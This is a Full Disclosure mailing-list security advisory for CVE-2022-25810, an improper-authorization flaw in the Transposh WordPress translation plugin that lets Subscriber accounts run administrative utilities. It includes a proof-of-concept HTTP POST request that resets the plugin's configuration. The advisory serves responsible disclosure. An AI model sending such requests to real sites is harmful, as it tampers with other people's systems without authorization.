[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] [CVE-2022-25810] Transposh <= 1.0.8.1 Improper Authorization Allowing Access to Administrative
From: "Julien Ahrens (RCE Security)" <info () rcesecurity ! com>
Date: 2022-07-22 14:49:29
Message-ID: BB22D6A9-0C25-40B5-B895-A0B67518BF73 () rcesecurity ! com
[Download RAW message or body]
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: Transposh WordPress Translation
Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/
Type: Improper Authorization [CWE-285]
Date found: 2022-02-21
Date published: 2022-07-22
CVSSv3 Score: 6.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)
CVE: CVE-2022-25810
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Transposh WordPress Translation 1.0.8.1 and below
4. INTRODUCTION
===============
Transposh translation filter for WordPress offers a unique approach to blog
translation. It allows your blog to combine automatic translation with human
translation aided by your users with an easy to use in-context interface.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
Transposh does not properly enforce authorization on functionalities available on
the plugin's "Utilities" page leading to unauthorized access for all user roles,
including "Subscriber".
Some of the affected functionality is:
tp_backup - Initiate a new backup
tp_reset - Reset the plugin's configuration
tp_cleanup - Delete automated translations
tp_dedup - Delete duplicates
tp_maint - Fix internal errors
tp_translate_all - Trigger an auto-translation of all entries
6. PROOF OF CONCEPT
===================
An exemplary request to reset the plugin's configuration, send the following
request using a "Subscriber" account:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 15
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your cookies]
Connection: close
action=tp_reset
7. SOLUTION
===========
None. Remove the plugin to prevent exploitation.
8. REPORT TIMELINE
==================
2022-02-21: Discovery of the vulnerability
2022-02-21: Contacted the vendor via email
2022-02-21: Vendor response
2022-02-22: CVE requested from WPScan (CNA)
2022-02-23: WPScan assigns CVE-2022-25810
2022-05-22: Sent request for status update on the fix
2022-05-24: Vendor states that there is no update planned so far
2022-07-22: Public disclosure
9. REFERENCES
=============
https://github.com/MrTuxracer/advisories
["signature.asc" (signature.asc)]
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEWVym3nC1+ioyX1+TzjvwrNEH1JsFAmLauPgACgkQzjvwrNEH
1JuSKg/+LcH/IbB1m7/PwFoRcUWHDxRYLe8re6oawxwyn1EnffbyudB5bUixJwqj
0u3FeaLQXxN58XxA/6/uEg2E76x7we6KhWKhHhY8lKdVPSgxZCe5bYeI9fK3tRJe
L2bo3njsXInHR3BQN0UDImjmOZyaui/CdSDsLjeTYxlrp+NYqbkU62JV2sxVYrj/
qqkbamWm/ADC3oIPEvIrI2CJ6+fxiQIto8nlK/stJtjYOVWuOK92vIxfd/X6dopM
+SgVnN1SdGfVyMdsJaoWm2j4odPminBYWXAVlDwI4cr10rBXSd22NW9zWEi2gN8N
U1vB8akH5xBZShgHdiHD3Q8GbdqhH7XI095xjw2W4bknGuIdiKMsJO/M7RCcI4Xo
wZG0HvfsFJsG288/tx33LTsbHMC+yfq4IlIZO9VxW/TJ2XK/u65DxakHMDxoQxb+
P6FHIk7MFm5Mi6L8hxbeQmkb1wegWEQ88eJNsdnJcDlbmeNm7qzMubNKJ+mfzT6t
0W5S7DeVJm1sVjjk6t9bwwhBIrEoWhjzh6drUu6A7beUngMOGibUbp/aj9R3yp6/
Z/0urpij4evsH1sA1WiYj60JWuo+v0wFwshMWcLCm6NtjTYJZw3HQAxdWtTSkUYi
zU3HSXF8g6EkStmDKVOxdLao89Zu+M93lQvE0Y4KN0qQKYk5aR4=
=0Qtt
-----END PGP SIGNATURE-----
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
--===============1920889931382453606==--
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic